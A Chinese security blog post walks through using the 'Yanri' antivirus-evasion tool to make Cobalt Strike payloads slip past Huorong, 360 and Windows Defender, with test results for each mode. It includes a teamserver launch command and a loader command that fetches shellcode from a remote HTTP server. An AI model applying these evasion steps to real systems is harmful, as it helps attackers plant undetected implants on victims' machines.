【新版】掩日免杀windows Defender
更新时间:2022.05.16
本文首发乌鸦安全知识星球
1. 介绍
掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
https://github.com/1y0n/av_evasion_tool/
下载之后本地打开:(记得关闭杀软)
2. 环境配置
安装环境:Windows10虚拟机
在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gcc和go的环境:
gcc安装
gcc --version
go安装
go version
3. 环境
在作者的介绍中,针对Cobalt Strike生成的木马要求:
针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。
因此在这里我们使用最常用的CS的木马来进行操作。
3.1 环境准备
在本地启动一个CS,服务端:
sudo ./teamserver 10.30.1.147 123
启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:
然后生成一个payload.c文件:
3.2 测试环境
测试机:
- Windows10 360主动防御
- Windows7 火绒主动防御
- Windows10 开启windows Defender
其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。
4. 免杀测试
4.1 通用免杀
在这里选择直接执行的方式,并且使用隐藏窗口的模式:
此时生成成功:
4.1.1 火绒(成功)
此时没有发现问题,上线测试:
4.1.2 360(成功)
关闭360的自动上传样本功能:
然后按位置扫描,没有发现问题:
上线测试下,此时上线正常:
4.1.3 Windows Defender(失败)
此时的 Windows Defender病毒库为最新版本:
静态测试
动态上线(被杀)
在上线之后,立刻被拦截查杀:
在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试:
在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。
4.1.4 强力模式(成功)
在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU
此时静态查杀,依旧正常
动态上线正常:
4.2 分离免杀
在这里执行的时候,会生成两个文件,一个是不含shellcode的shellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。
此时生成了两个文件:
静态查杀正常:
动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)
当有Windows Defender的时候:
直接被动态查杀,再试试其他的方式,发现全部被杀
4.3 网络分离
将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务:
python3 -m http.server 802
然后在远程进行加载:
dUu.exe http://10.30.1.147:802/dUu.txt
还是被Windows Defender杀了:
5. 总结
在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。
当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone!
【新版】掩日免杀windows Defender相关推荐
- 老树开新花之shellcode_launcher免杀Windows Defender
微信公众号:乌鸦安全 扫取二维码获取更多信息! 免杀效果 静态免杀 动态免杀效果(指的是可执行命令) 1. 准备条件 本文中的免杀方式在我写完文章之后,免杀基本已经失效,毕竟是见光死,所以仅供各位师傅 ...
- 艰难的mimikatz源码编译免杀 Windows Defender
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本文周一的时候,工具就已经上传GitHub了,所以工具应该是已经失效了!!!仅供参考! 本文mimikatz源码编译未能免杀Windows Def ...
- 新版掩日免杀——搭配CS使用测试
阅读前请注意: 本人发布的此篇技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站,服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵 ...
- pyinstaller打包逆向分析,顺便免杀Windows Defender
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. python3利用shellcode免杀火绒 1.1 什么是shellcode 在攻击中,shellcode是一段用于利用软件漏洞的有效负载,sh ...
- Powershell 免杀过 defender 火绒,附自动化工具
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术. 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看. powershell执行策略修改 1 获取 Powe ...
- 〖教程〗LadonGO免杀Win10 Defender
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段.B段.A段存活主机.指纹识别.端口扫描.密 ...
- 红队培训班作业 | 免杀过360和火绒 四种方法大对比
文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
- 免杀学习——PHP免杀
php免杀 php马作为最常用的上马方式之一,各类waf对其的防护与检测也在不断完善 相信各位在对一些网站渗透测试中碰到过传马被删或者被拦的情况,刚好最近整理了一些php免杀方法,下面来分享一下 字符 ...
- 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender
实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...
- 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
最新文章
- Android 自定义ProgressBar 实现进度圆环
- C++ 中emplace_back和push_back差异
- 理解mipi协议【转】
- linux虚拟机网络设置(本机使用公司内网)
- 基于Neutron的Kubernetes SDN实践经验之谈
- 电气6机30节点数据介绍(常适用于优化调度)
- arcgis oracle trace,ArcGIS应用Oracle Spatial特征分析
- YbtOJ-毒瘤染色【LCT】
- 小学奥数_7832 最接近的分数 python
- SpringMVC 运行原理及主要组件
- [Xcode 实际操作]五、使用表格-(11)调整UITableView的单元格顺序
- 第四周作业 简单地邮件发送实现
- python opencv 利用分水岭算法实现对物体的分割 图文详细注释版 以分割官网提供的硬币为例
- Atitit python3.0 3.3 3.5 3.6 新特性 Python2.7新特性1Python 3_x 新特性1python3.4新特性1python3.5新特性1值得关注的新特性1Pyth
- 分享一个蓝屏代码查询器
- hp原装usb无线打印服务器,从USB转换到无线 | 无线打印中心 | 惠普中国
- 萤石云摄像头无设备序列号验证码解决办法
- 如何将硬盘系统完整拷贝到另一硬盘?
- SVG之线条动画相关
- 前端开发工程师学习路线图(收藏版)